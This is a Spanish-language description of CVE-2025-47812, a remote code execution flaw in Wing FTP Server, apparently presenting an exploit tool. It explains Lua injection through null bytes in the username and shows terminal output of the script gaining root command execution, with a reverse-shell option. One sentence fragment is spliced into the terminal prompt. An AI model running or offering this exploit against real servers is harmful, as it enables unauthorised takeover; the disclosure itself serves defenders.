
CVE-2025-47812
CVE-2025-47812 es una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a Wing FTP Server versiones anteriores a la 7.4.4. Fue descubierta por un investigador de seguridad y se ha confirmado que se está explotando activamente en la naturaleza.
La vulnerabilidad reside en la lógica de autenticación de Wing FTP Server, específicamente en cómo maneja los bytes nulos (\0) en el parámetro username.
Los atacantes pueden inyectar código Lua arbitrario a través del campo de nombre de usuario, que el servidor escribirá en el archivo de sesión. Cuando este archivo de sesión se procesa más tarde, el código Lua inyectado se ejecuta, permitiendo a los atacantes ejecutar comandos a nivel de sistema.
/loginok.html a redes no confiables.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Este exploit se proporciona únicamente con fines educativos. Úselo de manera responsable y solo en sistemas para los que tenga permiso explícito para realizar pruebas. El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.